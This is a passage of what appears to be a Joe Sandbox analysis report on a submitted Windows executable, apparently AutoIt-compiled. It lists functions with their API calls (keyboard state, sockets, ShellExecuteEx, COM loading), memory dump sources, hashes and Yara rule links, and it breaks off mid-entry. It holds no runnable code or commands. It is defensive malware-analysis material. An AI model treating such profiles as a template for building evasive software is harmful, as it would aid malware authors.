                    Function 004642F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00464312
                    • LoadStringW.USER32(00000000), ref: 00464319
                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0046432F
                    • LoadStringW.USER32(00000000), ref: 00464336
                    • _wprintf.LIBCMT ref: 0046435C
                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0046437A
                    Strings
                    • %s (%d) : ==> %s: %s %s, xrefs: 00464357
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: HandleLoadModuleString$Message_wprintf
                    • String ID: %s (%d) : ==> %s: %s %s
                    • API String ID: 3648134473-3128320259
                    • Opcode ID: 965032fae8988b6724a64616dd310853d65f609a359c49a1a2d3266552516382
                    • Instruction ID: 8e316eae760c98dab52acacd6546c6ae495e9062239688ff7a3f09ebd5f77a5e
                    • Opcode Fuzzy Hash: 965032fae8988b6724a64616dd310853d65f609a359c49a1a2d3266552516382
                    • Instruction Fuzzy Hash: CB0167F2900208BFD751AB90DD89EFB776CEB08301F5009B6BB45E2151FA785E894B79
                    Function 0048D43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                    • GetSystemMetrics.USER32(0000000F), ref: 0048D47C
                    • GetSystemMetrics.USER32(0000000F), ref: 0048D49C
                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0048D6D7
                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0048D6F5
                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0048D716
                    • ShowWindow.USER32(00000003,00000000), ref: 0048D735
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0048D75A
                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 0048D77D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                    • String ID:
                    • API String ID: 1211466189-0
                    • Opcode ID: d3703f674391628daf823e2a44e71b595811e89c5d6afcb3d767f65da08f560a
                    • Instruction ID: 2f618d94a1d43a989375790be64f9a6bb81cc316bd664b93e4dd4f842dd9a18d
                    • Opcode Fuzzy Hash: d3703f674391628daf823e2a44e71b595811e89c5d6afcb3d767f65da08f560a
                    • Instruction Fuzzy Hash: 2EB1AE71901219EFDF14EF68C9857AE7BB1BF04701F08847AEC48AB295E738A950CB54
                    Function 00402A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                    Download Yara Rule
                    APIs
                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 00402ACF
                    • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00402B17
                    • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 0043C21A
                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 0043C286
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ShowWindow
                    • String ID:
                    • API String ID: 1268545403-0
                    • Opcode ID: 58d7e91fded017a6e0efb4e40d8d562d2957b08ffb939ead570b381b4f40fd88
                    • Instruction ID: 9bc26204a44dec3219c5fdbddb2daa96843464872a345c1f9b74dd9d2987fb79
                    • Opcode Fuzzy Hash: 58d7e91fded017a6e0efb4e40d8d562d2957b08ffb939ead570b381b4f40fd88
                    • Instruction Fuzzy Hash: 514111307046809ADF755B298ECCB6F7791AB45304F14887FE047B26E0CABDA846DB2D
                    Function 004670C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                    Download Yara Rule
                    APIs
                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 004670DD
                      • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                      • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00467114
                    • EnterCriticalSection.KERNEL32(?), ref: 00467130
                    • _memmove.LIBCMT ref: 0046717E
                    • _memmove.LIBCMT ref: 0046719B
                    • LeaveCriticalSection.KERNEL32(?), ref: 004671AA
                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 004671BF
                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 004671DE
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                    • String ID:
                    • API String ID: 256516436-0
                    • Opcode ID: 91fe55520eadb1a7270c94a8a07a9ee0fef937bad63877067fb5a25429b7f735
                    • Instruction ID: 188a4d0b29229593a2b146342a062b1bd5409cf6fda6c026f11dbcde1a99e618
                    • Opcode Fuzzy Hash: 91fe55520eadb1a7270c94a8a07a9ee0fef937bad63877067fb5a25429b7f735
                    • Instruction Fuzzy Hash: F131A131A00215EBCF00DFA5DC85AAFB7B8EF45714F1441BAF9049B246EB349E14CBA9
                    Function 004861D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                    Download Yara Rule
                    APIs
                    • DeleteObject.GDI32(00000000), ref: 004861EB
                    • GetDC.USER32(00000000), ref: 004861F3
                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004861FE
                    • ReleaseDC.USER32(00000000,00000000), ref: 0048620A
                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00486246
                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00486257
                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0048902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00486291
                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 004862B1
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                    • String ID:
                    • API String ID: 3864802216-0
                    • Opcode ID: cf317ad195164d60a9274800805a8c3d798bcd83c3ff523b59fa5e1fadae3bb4
                    • Instruction ID: f4278305449edce2f76c410d332ec57268d6ee35a6a277c822a0a6189647fcfb
                    • Opcode Fuzzy Hash: cf317ad195164d60a9274800805a8c3d798bcd83c3ff523b59fa5e1fadae3bb4
                    • Instruction Fuzzy Hash: 46317172101210BFEB115F50DC4AFEB3BADEF49755F0540A9FE08AA291D6759C41CB68
                    Function 0046EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                      • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                      • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                    • _wcstok.LIBCMT ref: 0046EC94
                    • _wcscpy.LIBCMT ref: 0046ED23
                    • _memset.LIBCMT ref: 0046ED56
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                    • String ID: X
                    • API String ID: 774024439-3081909835
                    • Opcode ID: 6e37ed649af5d512afd2ce7d6114d3d9866b74ed05b4e6f6fa3861298a33b37a
                    • Instruction ID: da02439699827519884de0a837ef4d7055a253f99ddb834d536b4edba3b8eab3
                    • Opcode Fuzzy Hash: 6e37ed649af5d512afd2ce7d6114d3d9866b74ed05b4e6f6fa3861298a33b37a
                    • Instruction Fuzzy Hash: E1C161756083019FD714EF25D841A5AB7E4FF85318F10492EF899A72A2EB38EC45CB4B
                    Function 00476B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                    Download Yara Rule
                    APIs
                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00476C00
                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00476C21
                    • WSAGetLastError.WSOCK32(00000000), ref: 00476C34
                    • htons.WSOCK32(?,?,?,00000000,?), ref: 00476CEA
                    • inet_ntoa.WSOCK32(?), ref: 00476CA7
                      • Part of subcall function 0045A7E9: _strlen.LIBCMT ref: 0045A7F3
                      • Part of subcall function 0045A7E9: _memmove.LIBCMT ref: 0045A815
                    • _strlen.LIBCMT ref: 00476D44
                    • _memmove.LIBCMT ref: 00476DAD
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                    • String ID:
                    • API String ID: 3619996494-0
                    • Opcode ID: 0c021546857269730462b0aef7fbe808168544cd7cd5e6da4896c9d16d032430
                    • Instruction ID: ed0775ecea4f9d6c11d03e52ad69743ddbee2f845c96f8b55ead14f2c665c5c3
                    • Opcode Fuzzy Hash: 0c021546857269730462b0aef7fbe808168544cd7cd5e6da4896c9d16d032430
                    • Instruction Fuzzy Hash: 3081E971204700AFC710EB25CC81EABB7A9EF84718F10892EF559A72D2DB78ED05CB59
                    Function 00401424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5023a88ac2a4e028a815ef4d4db6f605c18ba5c71fdc3231c60cda9a6e4bf417
                    • Instruction ID: a887e684d243743618d1057532b585a7ad503945d0d011121e70032f0d2e3d72
                    • Opcode Fuzzy Hash: 5023a88ac2a4e028a815ef4d4db6f605c18ba5c71fdc3231c60cda9a6e4bf417
                    • Instruction Fuzzy Hash: 85715F30900109EFDB04DF95CC89EBF7B75FF85314F14816AF915AA2A1C738AA51CBA9
                    Function 0048B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                    Download Yara Rule
                    APIs
                    • IsWindow.USER32(00BA2928), ref: 0048B3EB
                    • IsWindowEnabled.USER32(00BA2928), ref: 0048B3F7
                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0048B4DB
                    • SendMessageW.USER32(00BA2928,000000B0,?,?), ref: 0048B512
                    • IsDlgButtonChecked.USER32(?,?), ref: 0048B54F
                    • GetWindowLongW.USER32(00BA2928,000000EC), ref: 0048B571
                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0048B589
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                    • String ID:
                    • API String ID: 4072528602-0
                    • Opcode ID: af34dbccf799c1c6a714d1a93faded036c611a6d887c638bd2f6846a6a243747
                    • Instruction ID: 3cfba568ea5790526d5b286793119b4d477072028a14d6832b16bbf893ccb4d1
                    • Opcode Fuzzy Hash: af34dbccf799c1c6a714d1a93faded036c611a6d887c638bd2f6846a6a243747
                    • Instruction Fuzzy Hash: 9B71BF34601604EFDB21AF54CC95FBF7BA9EF09700F14486EE941973A2C739A891DB98
                    Function 0047F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 0047F448
                    • _memset.LIBCMT ref: 0047F511
                    • ShellExecuteExW.SHELL32(?), ref: 0047F556
                      • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                      • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                      • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                    • GetProcessId.KERNEL32(00000000), ref: 0047F5CD
                    • CloseHandle.KERNEL32(00000000), ref: 0047F5FC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                    • String ID: @
                    • API String ID: 3522835683-2766056989
                    • Opcode ID: 8b3da71be9337afea30d29a7ff14a4b93a0b57cf0db593304da16a2e435ab00b
                    • Instruction ID: 5c1dd39b7f321ddcc7bcc10d078eb251a602d9f768a890d439a18523313ae713
                    • Opcode Fuzzy Hash: 8b3da71be9337afea30d29a7ff14a4b93a0b57cf0db593304da16a2e435ab00b
                    • Instruction Fuzzy Hash: 3B61B1B1A006189FCB04EF55C48099EB7F5FF48314F14846EE819BB392CB38AD45CB88
                    Function 00460F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetParent.USER32(?), ref: 00460F8C
                    • GetKeyboardState.USER32(?), ref: 00460FA1
                    • SetKeyboardState.USER32(?), ref: 00461002
                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00461030
                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 0046104F
                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00461095
                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 004610B8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: MessagePost$KeyboardState$Parent
                    • String ID:
                    • API String ID: 87235514-0
                    • Opcode ID: f9d591f81d686d4ab57c3a6e12a7387580c65fa7c1b8952d65f3ab419e893261
                    • Instruction ID: d8e1dc28bdc088eb6cbc7413f3b60f262c6bc769533ec748a7a92d83500406ea
                    • Opcode Fuzzy Hash: f9d591f81d686d4ab57c3a6e12a7387580c65fa7c1b8952d65f3ab419e893261
                    • Instruction Fuzzy Hash: 5F51D1A05046D53DFB3642348C15BBBBEA95B06304F0C898EE1D4959E3E2DDDCC8D75A
                    Function 00460D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetParent.USER32(00000000), ref: 00460DA5
                    • GetKeyboardState.USER32(?), ref: 00460DBA
                    • SetKeyboardState.USER32(?), ref: 00460E1B
                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00460E47
                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00460E64
                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00460EA8
                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00460EC9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: MessagePost$KeyboardState$Parent
                    • String ID:
                    • API String ID: 87235514-0
                    • Opcode ID: f49cedba9ac32d54de8a0d60295adc9efc4f295a5ca7e66696c334580efe5f7b
                    • Instruction ID: 69172e86244207f9b898dfa665998bef84c2b13c00b7e8d8db4e4b2c62b94f0a
                    • Opcode Fuzzy Hash: f49cedba9ac32d54de8a0d60295adc9efc4f295a5ca7e66696c334580efe5f7b
                    • Instruction Fuzzy Hash: 035136A05447D53DFB368334CC41B7B7FA95B06300F08898EE1D4569C2E39AAC88D35A
                    Function 004655FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: _wcsncpy$LocalTime
                    • String ID:
                    • API String ID: 2945705084-0
                    • Opcode ID: 07e0947fe95a8180eaf0aa6e348e8d9897622cda980e67335bb2af8a3bf9752e
                    • Instruction ID: 7a6b7d837badcf90248cfae842bd011e2e93fbf2a36f5ea1b26b70f3dca78a8a
                    • Opcode Fuzzy Hash: 07e0947fe95a8180eaf0aa6e348e8d9897622cda980e67335bb2af8a3bf9752e
                    • Instruction Fuzzy Hash: 5541B565D1022476CB11EBB59846ACFB7B8AF05311F90485BF508E3221FA78E285C7AE
                    Function 0045D56C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0045D5D4
                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0045D60A
                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0045D61B
                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0045D69D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ErrorMode$AddressCreateInstanceProc
